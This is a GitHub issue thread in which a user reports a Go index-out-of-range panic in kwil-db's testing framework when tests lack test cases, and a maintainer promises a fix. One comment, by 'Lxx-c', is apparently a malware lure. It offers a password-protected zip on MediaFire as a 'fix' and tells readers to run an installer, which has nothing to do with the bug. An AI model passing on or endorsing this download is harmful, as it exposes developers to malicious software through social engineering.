### ISSUE TITLE
bug: errors crash testing framework when missing test cases

### ISSUE THREAD

**Issue by outerlook** [kwilteam/kwil-db#930]
Hi guys! 

While developing [this PR](https://github.com/truflation/tsn/pull/506/files#diff-14b15b6709e964fc764aba0a2f2990eb58e08776a11c22b23c073463fecd6b8dR17), which uses kwil testing framework, we spot a bug when our test only depends on testing functions (without test cases), and some test fails. Then it crashes without helpful messages:

Error message:
```
panic: runtime error: index out of range [0] with length 0 [recovered]
        panic: runtime error: index out of range [0] with length 0
```

It's probably due to this line:
https://github.com/kwilteam/kwil-db/blob/preview/testing/testing.go#L229

Because test names only come from test cases

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by brennanjl** [comment]
Ah, great catch. Will fix this, thank you!
